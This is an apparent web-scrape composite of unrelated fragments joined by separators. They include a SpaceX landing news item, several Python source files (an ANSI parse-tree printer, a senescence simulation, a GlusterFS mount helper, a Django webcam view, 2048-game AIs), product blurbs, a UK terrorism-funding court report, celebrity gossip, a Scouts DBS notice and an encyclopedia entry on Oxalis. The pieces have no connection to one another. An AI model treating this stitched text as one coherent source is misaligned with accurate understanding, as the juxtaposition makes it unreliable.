The rocket-flyback maneuver is part of SpaceX's effort to develop fully and rapidly reusuable rockets, a key priority of the company and its billionaire founder and CEO, Elon Musk.
SpaceX has already succeeded in bringing a Falcon 9 first stage down for a soft ocean splashdown. Last month, the company tried the bold boat landing for the first time and nearly pulled it off: The rocket stage hit its target but came down too hard and exploded on the deck.
Editor's Note: This story was updated at 2:45 p.m. EST to reflect SpaceX's decision not to pursue the drone ship landing with the Falcon 9 rocket stage. |
#!/usr/bin/env python3
"""Module providing an AnsiParseTreeWriter for formatted printing of
ptTools.ParseTreeNodes to an output channel on linux systems."""
__all__ = [
'BLINK',
'BOLD',
'COLOR',
'COLORS',
'COMMENT',
'PRECEDENCE',
'UNDERLINE',
'AnsiParseTreeWriter',
]
from . verbosewriter import VerboseParseTreeWriter
BLINK = 'blink'
BOLD = 'bold'
COLOR = 'color'
COLORS = 'colors'
COMMENT = 'comment'
PRECEDENCE = 'precedence'
UNDERLINE = 'underline'
class AnsiParseTreeWriter(VerboseParseTreeWriter):
"""Writer for printing attributed ptTools.ParseTreeNodes to an
output channel on linux systems.
Note that the ansi markup sequence behaves differently from
e.g. html. A closing markup closes all opened markups. However,
opening sequences CAN be nested, but are all closed when
encountering the closing sequence.
The current style description is updated while traversing
non-terminal nodes, but not written until reaching a terminal.
Every token is embraced in its own opening and closing markup
sequence.
"""
## ANSI print sequence:
## {ESC}[{ATTR};{BG};{256colors};{FG}m
## e.g.: "\033[38;5;255mfoobar\033[39m"
_ansi_constants = {'ESC': '\033',
'BG': '5',
'FG': '0',}
def __init__(self, out):
"""Initialized with an output channel."""
super().__init__(out)
self._style = {}
"""The currently queued style dictionary."""
def _ansi_dict_from(self, style):
"""Converts style dictionary to ansi description dictionary."""
## Order of attributest IS significant!
attr = '38'
if style.get(BLINK):
attr = '5;' + attr
if style.get(UNDERLINE):
attr = '4;' + attr
if style.get(BOLD):
attr = '1;' + attr
ansidict = {'ATTR': attr,
'CLR' : style.get(COLOR,'')}
ansidict.update(self._ansi_constants)
return ansidict
def _get_node_style(self, node):
"""Retrieves all inherited attributes of node and merges them
to one style dictionary.
Called from super.write_node(node).
"""
return node.all_attributes
def _get_token_style(self, tok):
"""Retrieves all attributes of token and returns style
dictionary.
Called from super.write_token(token).
"""
return tok.attributes
def _write_closing_markup(self, style=None):
"""Writes ansi style closing sequence to self.out, and clears
queued style information."""
self._write_closing_markup_raw(self._style)
self._style = {}
def _write_closing_markup_raw(self, style):
"""Writes ansi style closing sequence to self.out without
altering the queued style description."""
if style:
self._write_str("{ESC}[{FG}m".format(**self._ansi_constants))
def _write_leaf(self, node):
"""Writes terminal node with its tokens."""
if not node.tokens:
return
else:
## Tokens except the last token in terminalnode.tokens
## define their markup themselves, whereas the last token
## receives its node's markups.
for tok in node.tokens[:-1]:
token_style = self._get_token_style(tok)
self._write_opening_markup_raw(token_style)
super()._write_token(tok)
self._write_closing_markup_raw(token_style)
self._write_token(node.token) ## (last token).
def _write_opening_markup(self, style):
"""Queues style dictionary for output.
This method reimplements its superclass method. Called for
each node with the intention to write opening markups to
self.out. Here, we only queue the style information as we may
have to insert tokens with different markups, before.
"""
if style:
self._style.update(style)
def _write_opening_markup_raw(self, style):
"""Writes opening sequence as described by ansi_dict to
self.out, without altering the queued style description."""
if style:
ansi_dict = self._ansi_dict_from(style)
self._write_str('{ESC}[{ATTR};{BG};{CLR}m'.format(**ansi_dict))
def _write_indent(self, tok):
"""Calls super.
TODO - Suspend markup (to avoid preceeding underlines in
multiline comments.).
"""
super()._write_indent(tok)
def _write_spacing(self, tok):
"""Calls super.
TODO - Suspend markup (to avoid preceeding underlines in
multiline comments.).
"""
super()._write_spacing(tok)
def _write_token(self, tok):
"""Writes token and markups to self.out."""
self._write_opening_markup_raw(self._style)
super()._write_token(tok)
self._write_closing_markup_raw(self._style)
|
When the independent agency is the Milwaukee Area Investigative Team (MAIT), and the West Allis Police Department serves as the lead investigative agency for MAIT, it provides a complete report to the prosecutor for review. If the prosecutor determines there is no basis for prosecution of the law enforcement officer, access to the report as required by § 175.47(5)(b) will be posted below. The related investigative file and associated evidence will be made available to the public upon request, in a redacted format, under the Wisconsin Public Records Law (Wisconsin Stature §§ 19.31-19.39). |
'''
MIT License
Copyright (c) 2017 grokkers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
class NotResponding(Exception):
def __init__(self):
self.code = 504
self.error = 'API request timed out, please be patient.'
super().__init__(self.error)
class RequestError(Exception):
'''Base class for request errors'''
def __init__(self, resp, data):
self.response = resp
self.code = resp.status
self.method = resp.method
self.reason = resp.reason
self.error = data.get('error')
if 'message' in data:
self.error = data.get('message')
self.fmt = '{0.reason} ({0.code}): {0.error}'.format(self)
super().__init__(self.fmt)
class NotFoundError(RequestError):
'''Raised if the player/clan is not found.'''
pass
class ServerError(RequestError):
'''Raised if the api service is having issues'''
pass |
Our volume boosters by Fairchild are most commonly used to supply a higher but precise pressure to a particular line or control device. They take an unregulated supply line pressure and convert it to a well regulated, highly controlled pressure as required by the operation. Volume boosters also are used as part of an interface between pneumatic and electric circuits. Our volume boosters feature high flow capacity and a fast response. We offer a wide range of signal to output pressure ratios, pilot operated, various pipe sizes and accessories and options to meet your unique needs.
Forward/Exhaust Flow No Bleed Boosters available in a number of configurations essentially are used to convert a low flow signal to a high flow output.
Forward/Exhaust High Flow No Bleed Volume Boosters provide high capacity, fast response in a cost effective manner.
Forward/Exhaust High Flow No Bleed Volume Booster with Bypass Valve is specifically designed for accurate contol in valve and valve actuation systems.
Forward Ultra High Flow Volume Boosters as the name suggests provides significantly increased forward flow capability when needed.
Forward/Exhaust Ultra High Flow Volume Boosters also available to supply very high flow capacity in both forward and exhaust modes. |
from __future__ import division
from random import shuffle, choice, randint, seed
from os.path import expanduser
from numpy import log10
from scipy import stats
import numpy as np
import time
import math
import copy
import sys
import os
from pprint import pprint as pp
mydir = expanduser("~/")
sys.path.append(mydir + "GitHub/Emergence-Senescence/model")
GenPath = mydir + "GitHub/Emergence-Senescence/results/simulated_data/"
col_headers = 'sim,r,gr,mt,q,rls_min,rls_max,grcv,mtcv,rlscv,ct,rlsmean,rlsvar,total.abundance,species.richness'
OUT = open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv", 'w+')
print>>OUT, col_headers
OUT.close()
senesce_simple = lambda age, rls: (1-(age/(rls+0.01)))
#senesce_simple = lambda age, rls: 1
tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-8))#in the full implementation, don't enforce these parameters
#tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-4))
#tradeoff_reverse_logistic = lambda rls: rls/rls
g0delay = lambda rls: 1 / (1 + (rls/100))
#competitive_growth = lambda age:
def output(iD, sD, rD, sim, ct, r):
IndIDs, SpIDs = [], []
for k, v in iD.items():
IndIDs.append(k)
SpIDs.append(v['sp'])
#pp(IndIDs)
#pp(SpIDs)
N = len(IndIDs)
R = len(rD.items())
S = len(list(set(SpIDs)))
#RLSL=[]
#for i in IndIDs:
# RLSL.append(iD[i]['rls'])
RLSL=[iD[i]['rls'] for i in IndIDs]
rlsmean = np.mean(RLSL)
rlsvar = np.var(RLSL)
if N > 0:
#OUT = open(GenPath + 'SimData.csv', 'a')
OUT=open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv","a")
outlist = [sim, r, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, ct, rlsmean, rlsvar, N, S]
outlist = str(outlist).strip('[]')
outlist = outlist.replace(" ", "")
print>>OUT, outlist
OUT.close()
try:
print 'sim:', '%3s' % sim, 'ct:', '%3s' % ct,' N:', '%4s' % N, ' S:', '%4s' % S, ' R:', '%4s' % R, 'LSm:' '%1s' % rlsmean, 'LSv:' '%2s' % rlsvar
except UnboundLocalError:
print 'ERROR: N=0'
return
def immigration(sD, iD, ps, sd=1):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for j in range(sd):
if sd == 1 and np.random.binomial(1, u) == 0: continue
p = np.random.randint(1, 1000)
if p not in sD:
sD[p] = {'gr' : 10**np.random.uniform(gr, 0)}
sD[p]['mt'] = 10**np.random.uniform(mt, 0)
sD[p]['rls'] = 50#randint(rls_min,rls_max)
sD[p]['grcv']=10**np.random.uniform(-6.01,grcv)
sD[p]['mtcv']=10**np.random.uniform(-6.01,mtcv)
sD[p]['rlscv']=.15#10**np.random.uniform(-6.01,rlscv)
sD[p]['efcv']=10**np.random.uniform(-6.01,efcv)
es = np.random.uniform(1, 100, 3)
sD[p]['ef'] = es/sum(es)
sD[p]['a']=a
ID = time.time()
iD[ID] = copy.copy(sD[p])
iD[ID]['sp'] = p
iD[ID]['age']=np.random.geometric(.5)-1
#iD[ID]['age']=0#doesn't need to start with age==0...
iD[ID]['x'] = 0
iD[ID]['y'] = 0
iD[ID]['rls']=sD[p]['rls']; iD[ID]['mt']=sD[p]['mt']; iD[ID]['ef']=sD[p]['ef'];iD[ID]['gr']=sD[p]['gr'];iD[ID]['a']=sD[p]['a']
iD[ID]['q'] = 10**np.random.uniform(0, q)
return [sD, iD]
def consume(iD, rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
keys = list(iD)
shuffle(keys)
for k in keys:
if len(list(rD)) == 0: return [iD, rD]
c = choice(list(rD))
e = iD[k]['ef'][rD[c]['t']] * iD[k]['q']#why does this dep on the indiv's q?
#pp(iD[k]['ef'][rD[c]['t']])
#pp(e)
#To account for the Frenk et al. 2017, one idea that you had was to make the indiv a generalist by taking a max of
#iD[k]['ef'][rD[c]['t']] and another number (e.g., (1/3))
#but it would be better to do some distrn that has age as a param, so that it is generalizable and can be randomized.
iD[k]['q'] += min([rD[c]['v'], e])
rD[c]['v'] -= min([rD[c]['v'], e])
if rD[c]['v'] <= 0: del rD[c]
return [iD, rD]
def grow(iD):
for k, v in iD.items():
m = v['mt']
iD[k]['q'] -= v['gr'] * (v['q'])
if v['age']==0 and v['q'] < m/(0.5+v['a'])*(0.5-v['a']):#daughters are born in G0 phase,we know that
#theyre smaller in G0. We don't want to kill them all because of it, though
del iD[k]
elif v['q'] < m:
del iD[k]
return iD
def maintenance(iD):#mt is less for juveniles
for k, v in iD.items():
if v['age']==0:
iD[k]['q'] -= v['mt']/(0.5+v['a'])*(0.5-v['a'])
if v['q'] < v['mt']/(0.5+v['a'])*(0.5-v['a']): del iD[k]
else:
iD[k]['q'] -= v['mt']
if v['q'] < v['mt']: del iD[k]
return iD
def reproduce(sD, iD, ps, p = 0):
for k, v in iD.items():
if v['gr'] > 1 or v['gr'] < 0:
del iD[k]
elif v['q'] > v['mt']/(0.5+v['a']) and np.random.binomial(1, v['gr']) == 1:
if v['age'] >= v['rls'] or v['mt']<0:
del iD[k]
else:
iD[k]['q'] = v['q']*(0.5+v['a'])
grorig=(v['gr'])/(senesce_simple(v['age'],v['rls']))
iD[k]['gr']=v['gr']/(senesce_simple((v['age']-1),v['rls']))*(senesce_simple(v['age'],v['rls']))
#modifier based on the newly incremented age value, after removing the gr reduction due to previous age
#in full implementation the sscnc model will be chosen at random from a list of choices
i = time.time()
iD[i] = copy.deepcopy(iD[k])
iD[k]['age']+=1
#in addition to copying physiology, need to copy the rlsmax---
#rlsmax is determined genetically so there should be a chance of mutation, here with normally distributed
#effect sizes
iD[i]['rls']=np.random.normal((v['rls']),sD[v['sp']]['rlscv']*v['rls'],None)
#pp(iD[k]['age']);pp(iD[k]['rls'])
try:
iD[i]['gr']=np.random.normal(grorig,(sD[v['sp']]['grcv']*grorig),None)#these should not be normal distrns, should be negv-biased
iD[i]['mt']=np.random.normal(v['mt'],sD[v['sp']]['mtcv']*v['mt'],None)
#is total ef allowed to != 1
except ValueError:
del iD[i]; continue
if iD[i]['gr'] > 1 or iD[i]['gr'] < 0:
del iD[i]; continue
iD[i]['q']=(v['q'])/(0.5+v['a'])*(0.5-v['a'])
iD[i]['age']=0
return [sD, iD]
def iter_procs(iD, sD, rD, ps, ct):
procs = range(6)
shuffle(procs)
for p in procs:
if p == 0: rD = ResIn(rD, ps)
elif p == 1: pass#sD, iD = immigration(sD, iD, ps)
elif p == 2: iD, rD = consume(iD, rD, ps)
elif p == 3: iD = grow(iD)
elif p == 4: iD = maintenance(iD)
elif p == 5: sD, iD = reproduce(sD, iD, ps)
N = len(list(iD))
return [iD, sD, rD, N, ct+1]
def ResIn(rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for i in range(r):
p = np.random.binomial(1, u)
if p == 1:
ID = time.time()
rD[ID] = {'t' : randint(0, 2)}
rD[ID]['v'] = 10**np.random.uniform(0, 2)
return rD
def run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a=0, rD = {}, sD = {}, iD = {}, ct = 0, splist2 = []):
print '\n'
rD={};iD={};sD={}
if iD=={} and sD=={} and rD=={}:
pass
else:
sys.exit()
r = choice([10,100])#10**randint(0, 2)
u = 10**np.random.uniform(-2, 0)
ps = r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a
sD, iD = immigration(sD, iD, ps, 1000)#this is the initial number of indivs
while ct < 2000:#this is the number of timesteps
if ct < 1:
print str(rls_min) + ' ' + str(rls_max) + " " + str(r)
iD, sD, rD, N, ct = iter_procs(iD, sD, rD, ps, ct)
if (ct > 1400 and ct%100 == 0) or (ct == 1):
output(iD, sD, rD, sim, ct, r)
for sim in range(500):#number of different models run (had been set at 10**6)
seed(time.time())
gr = np.random.uniform(-2,-1)
mt = np.random.uniform(-2,-1)
rls_min = randint(1,10)
rls_max = randint(rls_min,100)
grcv = np.random.uniform(-6,-0.3)
mtcv = np.random.uniform(-6,-0.3)
rlscv = np.random.uniform(-6,-0.3)
efcv = np.random.uniform(-6,-0.3)
q = choice([1, 2])
a=.35#a can take values [0,0.5)
run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a)
|
A mother- of- two from Coventry appeared in court yesterday accused of providing weapons and military equipment to a terrorist group allegedly linked to al Qaida.
Frzana Khan(41) from Anerly Way, is charged with two counts of conspiracy to provide money and other property to Lashkar- e- Tayyiba, a Kashmiri separatist group.
She appeared before Bow Street Magistrates' Court in central London along with Mohammed Ajmal Khan ( 30) and Palvinder Singh (29).
Both Khan, of Broad Street, Coventry, and Singh, of Freeman Street, Coventry, are also each charged with two counts of conspiracy to provide funds and other equipment to the group.
Mohammed Khan is also charged with directing part of the Kashmiri separatist group and with being a member of the group, a " proscribed" organisation.
All three defendants are alleged to have supported the organisation by providing funds and other equipment, including Kevlar, high technology equipment and firearms that could be used for military purposes.
All three were remanded in custody to reappear before the Old Bailey on March 14. |
import json
import os
import sys
import logging
from subprocess import Popen, PIPE
def mkdir(directory):
if not os.path.isdir(directory):
cmd = 'mkdir -p %s' % directory
Popen(cmd, shell=True)
def mount(entry_point, mount_point):
# Check if the mount point exists. If not
# go ahead and create it.
# mount -t glusterfs entry_point mount_point
cmd = 'mount -t glusterfs %s %s' % (entry_point,
mount_point)
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
def umount(mount_point):
cmd = 'cat /etc/mtab | grep /service/data | awk \'{print $2}\''
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
if output.strip() != "":
cmd = 'umount %s' % mount_point
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
cmd = sys.argv[1]
if cmd == "mount":
entry = sys.argv[2]
mkdir('/service/data')
mount(entry, '/service/data')
elif cmd == "umount":
umount('/service/data')
|
A timeless and fashionable brogue boot is Frank Wright Cypress. This lace up style sits above the ankle and looks great when styled with jeans. Features include traditional brogue stitching, a lace up front and chunky stitching to the sole unit. Subtle branding details include the Frank Wright pull tab and cross stitching at the back of the boot. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (C) 2011-2015 German Aerospace Center DLR
(Deutsches Zentrum fuer Luft- und Raumfahrt e.V.),
Institute of System Dynamics and Control
All rights reserved.
This file is part of PySimulator.
PySimulator is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PySimulator is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with PySimulator. If not, see www.gnu.org/licenses.
'''
import csv, numpy, collections
from .. import IntegrationResults
fileExtension = 'csv'
description = 'Comma Separated Values for FMI Compliance Checker'
class Results(IntegrationResults.Results):
''' Class for hosting simulation results in csv format:
First row: Names of variables
First column: Independent variable, e.g. Time
Example:
Time,Mechanical.Inertia.J,y,Mechnical.Inertia.w
0.0,20.0,3.6820238572822689e-4,0.0
0.1,20.0,6.7829872398723383e-4,0.7293789273984797e-2
0.2,20.0,4.0290389058209473e-3,0.7823794579232536e-1
'''
def __init__(self, fileName):
IntegrationResults.Results.__init__(self)
self.fileName = fileName # File name of result file
''' Load file
'''
'''
csvfile = open(self.fileName, 'rb')
reader = csv.reader(csvfile, delimiter=';')
self._name = reader.next() # first row contains the variable names
self._data = numpy.array(reader.next(), dtype='float64')
i=0
for row in reader:
self._data = numpy.row_stack((self._data, numpy.array(row, dtype='float64')))
print i
i=i+1
csvfile.close()
'''
csvfile = open(self.fileName, 'rb')
dialect = csv.Sniffer().sniff(csvfile.readline())
csvfile.seek(0)
reader = csv.reader(csvfile, dialect)
self._name = reader.next() # first row contains the variable names
self._info = len(self._name) * ['']
self._filterName()
data = numpy.loadtxt(csvfile, delimiter=dialect.delimiter)
t = data[:, 0]
self.timeSeries.append(IntegrationResults.TimeSeries(t, data, "linear"))
self.nTimeSeries = len(self.timeSeries)
csvfile.close()
self.isAvailable = True # Shows, if there is a file available to be read
def _filterName(self):
for i in xrange(len(self._name)):
x = self._name[i]
k = x.find('=')
if k > -1: # Skip the parts behind "="
self._info[i] = x[k:]
x = x[:k]
if len(x) > 5: # Convert der(a.b.c.d) to a.b.c.der(d)
if x[:4] == 'der(':
k = x.rfind('.')
if k > -1:
x = x[4:k] + '.der(' + x[k + 1:]
self._name[i] = x
def readData(self, variableName):
nameIndex = self._name.index(variableName)
if nameIndex < 0:
return None, None, None
y = self.timeSeries[0].data[:, nameIndex]
t = self.timeSeries[0].independentVariable
method = self.timeSeries[0].interpolationMethod
return t, y, method
def data(self, variableName):
nameIndex = self._name.index(variableName)
if nameIndex < 0:
return None
return self.timeSeries[0].data[:, nameIndex]
def getVariables(self):
# Generate the dict
variables = dict()
# Fill the values of the dict
for i in xrange(len(self._name)):
name = self._name[i]
variability = 'continuous'
value = None
infos = collections.OrderedDict()
infos['Variability'] = variability
if not self._info[i] == '':
infos['Description'] = self._info[i]
unit = None
seriesIndex = 0
column = i
sign = 1
variables[name] = IntegrationResults.ResultVariable(value, unit, variability, infos, seriesIndex, column, sign)
return variables
def getFileInfos(self):
# No relevant file infos stored in a csv result file
return dict()
|
STAR SIGHTINGS: Madonna Raises Millions for Charity, Jordan Rodgers Returns to 'Bachelor' Mansion and More!
ET has details on what some of your favorite celebs were up to recently that might have flown under your radar.
Throughout the evening of Madonna's ultra-VIP charity event at Miami's Art Basel on Dec. 2, guests were urged by the hostess to take advantage of the ever-flowing Perrier-Jouët Belle Epoque at their tables to help them dig deeper into their pockets to contribute to the cause.
Madonna's celeb friends like Ariana Grande, Sean Penn, Chris Rock, Alex Rodriguez, Dave Chappelle, Karolina Kurkova, and David Blaine participated in the auction where over $7.5 million funds were raised. James Corden served as Master of Ceremonies and kicked off the night saying, "let's toast with Perrier-Jouët for Raising Malawi," at Madonna's star-studded charity bash with cuvées provided by the iconic champagne house.
The day before on the opposite coast, Michael Phelps was on hand to present the Best eSports Player of the Yearto Marcelo "Coldzero" David at The Game Awards 2016 in Los Angeles.
Also on Dec. 1, Kendall Jenner's rumored beau A$AP Rocky took pictures in the photo booth and spent some time with Russell Simmons at the 7th Annual Bombay Sapphire Artisan Series Finale Party -- hosted by Russell and Danny Simmons -- at Art Basel in Miami.
The same day, Bravo stars Lilly Ghalichi of Shahs of Sunset and Gretchen Rossi from Real Housewives of Orange Countyposed for photos together at HAIRtamin "Goes Hollywood" at Warwick in Los Angeles.
DuJour Media, Gilt & JetSmarter hosted a party to kick off Art Basel week on Nov. 30 with friends Larsa Pippen, Jonathan Cheban, Audrina Patridge and Karolina Kurková at The Confidante in Miami.
On Nov. 17, Dancing With the Starsalum and NFL MVP Von Miller hosted a workout event with Chef's Cut Real Jerky in New York City.
Brooklyn-based contemporary artist Mark Anthony Green partnered with ultra-premium tequila brand, Tequila Avión, for his What Comes After J? exhibit at W South Beach, where he hosted a private 50-person dinner for guests, including Tyson Beckford and Karrueche Tran at Art Basel in Miami.
Gossip Girl alum Penn Badgley made his Miami Art Basel debut with his band MOTHXR at the Life of the Party event held at the Brickell City Centre on Nov. 28. He and the band had throngs of ladies and fans hanging on every lyric as they played songs from their new album, including "Victim, She Can't Tell" and "Touch." The band later dined at hotspot Quinto La Huella at EAST, where Badgley, now rocking blond locks, was overheard telling a fan it was their first time playing in Miami and they couldn't wait to come back.
STK Midtown New York City was lively on Saturday night as the cast of Saturday Night Live and host Emma Stone descended upon the restaurant for an after-party that went well into the early morning. Cast members, including Kate McKinnon, Aidy Bryant, and Leslie Jones, began filing in around 1:30 a.m. and were joined shortly after by Questlove as well as Stone. Colin Jost, Kyle Mooney and Lorne Michaels were also in attendance.
Stone, who looked elegant in a navy blue suede pea coat and stilettos, was spotted enjoying oysters and sipping on margaritas throughout the evening. She and a group of more than 10 friends closed out the night, leaving around 5 a.m.
Beverley Mitchell brought husband Michael Cameron and their children, Kenzie, 3, and Hutton, 1, to the 6th Annual Santa's Secret Workshop, benefiting L.A. Family Housing at Andaz in West Hollywood, California, on Dec. 3.
Meanwhile, This Is Us star Chrissy Metz left a very generous tip and said goodbye to the staff after getting a manicure at Nail Garden in Burbank, California, on Dec. 4.
On Dec. 5, Bachelor and Bachelorette alums Luke Pell, Jordan Rodgers, JoJo Fletcher, Becca Tilley, Robert Graham and Chris Soules attended Becca Tilley's Blog and YouTube launch party at The Bachelor Mansion in Los Angeles, while Victoria's Secret Angel Taylor Hill sat down with Dimpy Sethi of Amazon's live-stream fashion and beauty show Style Code Live to spill on her beauty hacks, affordable hair favorites and life as a an Angel.
Hallmark Channel held a screening for the upcoming A Nutcracker Christmas on Dec. 6 at The Grove in Los Angeles. In attendance were the stars of the movie, Amy Acker, Sascha Radetsky and Sophia Lucia along with Jojo Siwa, Trevor Donovan, ET's Cameron Mathison, Chelsea Kane and many more. The guests were delighted to be joined by dancers from the Moorpark Civic Ballet and Dance Theatre.
The new movie is part of Hallmark Channel's Countdown to Christmas and premieres Saturday at 8 p.m. ET/PT on Hallmark Channel. |
"""Add the high level classes (person/organization/etc.) to a label file."""
import argparse
import pickle
from tqdm import tqdm
def read_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--labels_file',
type=unicode,
help='Pickled file with a list of labels')
parser.add_argument('--mapping_file',
type=unicode,
help='Pickled file with the mapping from yago labels'
'to high level labels')
return parser.parse_args()
def pickle_from_file(filename):
with open(filename, 'r') as input_file:
result = pickle.load(input_file)
return result
def main():
args = read_arguments()
print 'Reading arguments'
labels = pickle_from_file(args.labels_file)
mapping = pickle_from_file(args.mapping_file)
print 'Processing labels'
for index, label in tqdm(enumerate(labels)):
if len(label) != 5:
print 'Malformed label at index {}'.format(index)
continue
if label[0].startswith('O'):
continue
yago_category = label[1].replace('I-', '').replace('B-', '')
if not yago_category in mapping:
print 'Error, unknown yago category {}'.format(yago_category)
continue
high_level_category = label[1][0] + '-' + mapping[yago_category]
labels[index] = label[:3] + (high_level_category, ) + label[4:]
print 'Saving results'
with open(args.labels_file, 'w') as output_file:
pickle.dump(labels, output_file)
if __name__ == '__main__':
main()
|
All Leaders and Adults at 8th Ashford including parent helpers within any Section, that help with any activity involving the care and welfare of your child, does this under the guidance and support of the Scout Associations Child Protection Policy.
If you choose to send your son or daughter to 8th Ashford, on the first evening they attend you will be asked to stay for an induction meeting. During this meeting each adult will be issued with the above mentioned yellow card for their own information and safeguard. Also discussed and handed out will be the Criminal Records Bureau Clearance Application Form.
Many adults through their own careers or past times may have alreday completed a 'DBS' form at some time. You will be asked to submit another on behalf of Gillwell the Scout Association Headquarters, if you wish to contribute your help for trips and activities. One clearance certificate does not globally cover you for any association. Again these forms and any matters arising will be covered in your first induction meeting.
Please read the latest information from The Scout Association regarding DBS Clearance. |
import logging
import json
import sys
import tempfile
from mimetypes import guess_type
from django.http import HttpResponse
from django.conf import settings
from cam.models import WebCam, is_file_image
logger = logging.getLogger(__name__)
def get_snapshot(request):
"Take a webcam snapshot and return it as HTTP response"
content_type = 'application/json'
body = json.dumps('Failed snapshot')
# Try every available WebCam object to take the snapshot,
# until the first one that succeeds
for cam in WebCam.objects.all().order_by('priority'):
logger.debug('Attempting saveSnapshot with %s' % (cam))
snapshot_file = cam.saveSnapshot()
if snapshot_file and is_file_image(snapshot_file):
content_type, _ = guess_type(snapshot_file)
if content_type:
body = open(snapshot_file, 'rb').read()
break
else:
content_type = 'application/json'
return HttpResponse(body, content_type=content_type)
|
Learn about Watch Technologies' sluice gates, gate actuators, and water management control systems, and recent projects in the Watch Technologies blog.
Monitoring multiple pipeline data collection stations. Master Station and four remotes, one with weather station. Master station PC HMI is a web server. Cell-modem telemetry enabled, Internet display and database access via client’s web site. |
import random
class _AI:
def get_command_letter(self, command):
if command == 0:
return "w"
elif command == 1:
return "a"
elif command == 2:
return "s"
else:
return "d"
class RandomAI(_AI):
def __init__(self):
self.name = "random_ai"
def get_next_command(self, available_commands):
self.current_command = random.randint(0, 3)
return self.get_command_letter(self.current_command)
class DirectionAI(_AI):
def __init__(self):
self.name = "direction_ai"
def get_next_command(self, available_commands):
if available_commands["s"]: # Prefer "down" movements
return "s"
elif available_commands["a"]: # Then "left"
return "a"
elif available_commands["d"]: # Then "right"
return "d"
else: # Only move "up" if no others are available
return "w"
class PairCheckAI(_AI):
def __init__(self):
self.name = "pair_check_ai"
self.direction_points = {"w": 0, "a": 0, "s": 0, "d": 0}
def get_next_command(self, available_commands):
# Check which direction to move
# print("calculating points for board:")
h_points = self.calc_points(self.board)
rotated_board = self.rotate_board(self.board)
v_points = self.calc_points(rotated_board)
# No points, return a random direction
if h_points == 0 and v_points == 0:
# print("nothing, random movement")
return self.get_command_letter(random.randint(0, 3))
# print("h: " + str(h_points))
# print("v: " + str(v_points))
# Up/down and left/right scores are the same
self.direction_points["w"] = v_points
self.direction_points["a"] = h_points
self.direction_points["s"] = v_points
self.direction_points["d"] = h_points
dir_letter = max(self.direction_points, key=self.direction_points.get)
# print("moving: " + dir_letter)
return dir_letter
def update_board(self, board):
self.board = board
# Calculates the number of points in each row
def calc_points(self, board):
# self.print_board(board)
total_score = 0
for row in board:
score = 0
for n in row:
if n == 0:
pass
elif score == 0:
score = n
elif score != n:
score = n
elif score == n:
# will_score = True
score *= 2
total_score += score
score = 0
return total_score
# Rotates the board
def rotate_board(self, board):
row_size = len(board)
board_size = row_size ** 2
rotated = []
for i in range(0, row_size):
rotated.append([])
for i in range(0, board_size):
rotated[i / row_size].append(board[i % row_size][i / row_size])
return rotated
def print_board(self, board):
for i in board:
print(i)
|
For other uses, see Oxalis (disambiguation).
Oxalis /ˈɒksəlɪs/ is a large genus of flowering plants in the wood-sorrel family Oxalidaceae comprising about 570 species. The genus occurs throughout most of the world, except for the polar areas; species diversity is particularly rich in tropical Brazil, Mexico and South Africa.
Many of the species are known as wood sorrels (sometimes written "woodsorrels" or "wood-sorrels") as they have an acidic taste reminiscent of the sorrel proper (Rumex acetosa), which is only distantly related. Some species are called yellow sorrels or pink sorrels after the color of their flowers instead. Other species are colloquially known as false shamrocks, and some called sourgrasses. For the genus as a whole, the term oxalises is also used.
These plants are annual or perennial. The leaves are divided into three to ten or more obovate and top notched leaflets, arranged palmately with all the leaflets of roughly equal size. The majority of species have three leaflets; in these species, the leaves are superficially similar to those of some clovers. Some species exhibit rapid changes in leaf angle in response to temporarily high light intensity to decrease photoinhibition.
